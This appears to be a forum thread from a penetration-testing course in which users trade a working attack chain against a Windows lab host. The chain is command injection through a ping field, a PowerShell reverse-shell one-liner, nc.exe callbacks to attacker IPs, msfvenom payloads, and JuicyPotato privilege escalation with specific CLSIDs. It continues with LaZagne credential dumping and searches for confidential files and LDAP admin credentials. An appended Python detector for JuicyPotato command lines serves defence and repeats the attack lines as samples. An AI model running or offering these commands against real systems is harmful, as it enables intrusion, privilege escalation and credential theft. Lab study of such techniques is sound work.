You need first to priv esc to be able to search in the file system; I guess this question should be in the 3rd position.
Try this script to find potential CLSIDs to work with: GetCLSID.ps1
Try using this PowerShell script to get potential CLSIDs (GetCLSID.ps1), and then you can also try to get the right ones using this one: https://raw.githubusercontent.com/ohpe/juicy-potato/master/Test/test_clsid.bat
- Escalate Privs (Find a working CLSID to use with JuicyPotato, I started from bottom up on the .list in the github repo and it worked for me first try).
- Upload LaZagne.exe to target
- Run LaZagne.exe all
Hello,
JuicyPotato returns “Wrong Argument”. Should I just keep trying with other clsid?
put the clsid in quotes
Hi. Can anyone help me? I have been stuck trying to execute JuicyPotato. I saved the .exe in C:\windows\tracing but it returns nothing when I execute it.
Also, when I run test_clsid.bat, it returned no CLSIDs that may be used for JuicyPotato even though I have run GetCLSID.
I am stuck in this as well.
Can anyone help?
I am available at ‘rmjhin@gmail.com’
Thank you.
Hey, can you send me the notes if you don't mind?
I’m having trouble catching the elevated shell after JuicyPotato successfully elevates privileges. I’ve tried several methods, like using cmd.exe with PowerShell reverse shell commands and putting both nc.exe and nc64.exe on the target. I even created a .bat file to make the command easier to use. The CLSIDs aren’t the problem since I’ve found multiple working ones using the CLSID.ps1 script.
While I troubleshoot this, I might grab a sub from Firehouse Subs to keep my energy up—maybe a Hook & Ladder or Firehouse Meatball to fuel my efforts!
C:\windows\Temp\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c C:\windows\Temp\nc.exe 10.10.14.141 8443 -e cmd.exe" -t * -c "{7A6D9C0A-1E7A-41B6-82B4-C3F7A27BA381}"
Did it allow you to make file transfers after the new VPN?
I already solved the 1st Assessment… tip:
Use Juicy Potato 32-bit → GitHub - k4sth4/Juicy-Potato: Windows Privilege Escalation
with this CLSID → Windows Server 2016 Standard | juicy-potato
Use a reverse shell and a listener using msfconsole for a second reverse shell connection.
LaZagne.exe & find
P.S.: use post/windows/manage/execute_powershell to execute commands
for more detail and help → tylerjimenez120@gmail.com
Try LaZagne.exe. Upload it to the target server and execute it with the (all) parameter.
Thanks brother I was stuck for weeks due to this issue. Syntax was like:
JP.exe -l 1337 -p c:\Windows\System32\cmd.exe -t * -c "{CLSID}" -a "/c C:\Users\Public\nc.exe IP PORT -e cmd.exe"
Thanks for the hint, it worked
Q
127.0.0.1 | systeminfo
powershell one liner rev shell
nc -lvnp 4444
127.0.0.1 | powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.62',4444);$stream = $client.GetStream();$writer = New-Object System.IO.StreamWriter($stream);$reader = New-Object System.IO.StreamReader($stream);while(($cmd = $reader.ReadLine()) -ne $null){$output = Invoke-Expression $cmd 2>&1; $writer.WriteLine($output); $writer.Flush()}"
file transfer
sudo smbserver.py TMP /home/rid/ -smb2support
copy \\10.10.14.62\TMP\jp.exe
127.0.0.1 | powershell mkdir C:\temp
copy \\10.10.14.62\TMP\jp.exe C:\temp\jp.exe
127.0.0.1 | powershell copy \\10.10.14.62\TMP\jp.exe C:\temp\jp.exe
msfvenom -p cmd/windows/reverse_powershell lhost=10.10.14.62 lport=9999 > shell.bat
127.0.0.1 | powershell copy \\10.10.14.62\TMP\shell.bat C:\temp\shell.bat
download nc.exe
127.0.0.1 | powershell copy \\10.10.14.62\TMP\nc.exe C:\temp\nc.exe
C:\temp\jp.exe -t * -p C:\temp\shell.bat -l 4444
C:\temp\jp.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c C:\temp\nc.exe 10.10.14.62 9999 -e cmd.exe" -t * -c "{7A6D9C0A-1E7A-41B6-82B4-C3F7A27BA381}"
dir C:\ /s /b | findstr /i "confidential.txt"
type "C:\Users\Administrator\Documents\My Music\confidential.txt"
dir C:\ /s /b | findstr /i "*.config"
powershell -Command "Get-ChildItem -Path C:\Users\ -Recurse -File | Select-String -Pattern 'ldapadmin'"
type C:\Users\Administrator\.ApacheDirectoryStudio\.metadata\.plugins\org.apache.directory.studio.connection.core\connections.xml
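Added example, written from the defender's side and not part of this thread: a small Python detector that flags process-creation records (Sysmon Event ID 1 style) whose command line carries JuicyPotato's flag combination (-l port, -p program, -t t|u|*, -c {CLSID}) regardless of flag order or binary name, since the .exe is routinely renamed as in the posts above. The log records are constructed here to mirror the command lines in this thread.

```python
import re

# JuicyPotato's documented flags. Order is arbitrary and the binary name is untrustworthy,
# so each flag is matched independently and the hit is scored on how many are present.
FLAG_PATTERNS = {
    "listen_port": re.compile(r'(?:^|\s)-l\s+(\d{1,5})\b'),
    "program":     re.compile(r'(?:^|\s)-p\s+("[^"]+"|\S+)'),
    "create_type": re.compile(r'(?:^|\s)-t\s+([tu*])(?:\s|$)'),
    "clsid":       re.compile(r'(?:^|\s)-c\s+"?(\{[0-9A-Fa-f-]{36}\})"?'),
}

# Constructed sample events (not real telemetry): full invocation, benign process,
# an invocation missing -c, and a PowerShell reverse-shell one-liner that also uses "-c".
SAMPLE_EVENTS = [
    {"Image": r"C:\temp\jp.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'C:\temp\jp.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c C:\temp\nc.exe 10.10.14.62 9999 -e cmd.exe" -t * -c "{7A6D9C0A-1E7A-41B6-82B4-C3F7A27BA381}"'},
    {"Image": r"C:\Windows\System32\notepad.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"notepad.exe C:\Users\bob\notes.txt"},
    {"Image": r"C:\temp\jp.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"C:\temp\jp.exe -t * -p C:\temp\shell.bat -l 4444"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient(10.10.14.62,4444);$stream = $client.GetStream()"'},
]


def score_command_line(cmdline: str) -> dict:
    """Return the JuicyPotato-style flags (name -> value) found in one command line."""
    # Typographic quotes appear in copy-pasted notes and some log exports; normalise them first.
    text = cmdline.replace("\u201c", '"').replace("\u201d", '"')
    found = {}
    for name, pattern in FLAG_PATTERNS.items():
        match = pattern.search(text)
        if match:
            found[name] = match.group(1)
    return found


def detect_juicypotato(events, min_flags: int = 3) -> list:
    """Flag events carrying at least min_flags of the four JuicyPotato flags.

    The default of 3 still catches invocations with a missing or placeholder CLSID,
    while a lone "-c" (e.g. powershell -c ...) never reaches the threshold."""
    hits = []
    for event in events:
        found = score_command_line(event.get("CommandLine", ""))
        if len(found) >= min_flags:
            hits.append({"Image": event.get("Image"), "ParentImage": event.get("ParentImage"), **found})
    return hits


if __name__ == "__main__":
    for hit in detect_juicypotato(SAMPLE_EVENTS):
        print(hit)
```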
This was the post that allowed me to keep my sanity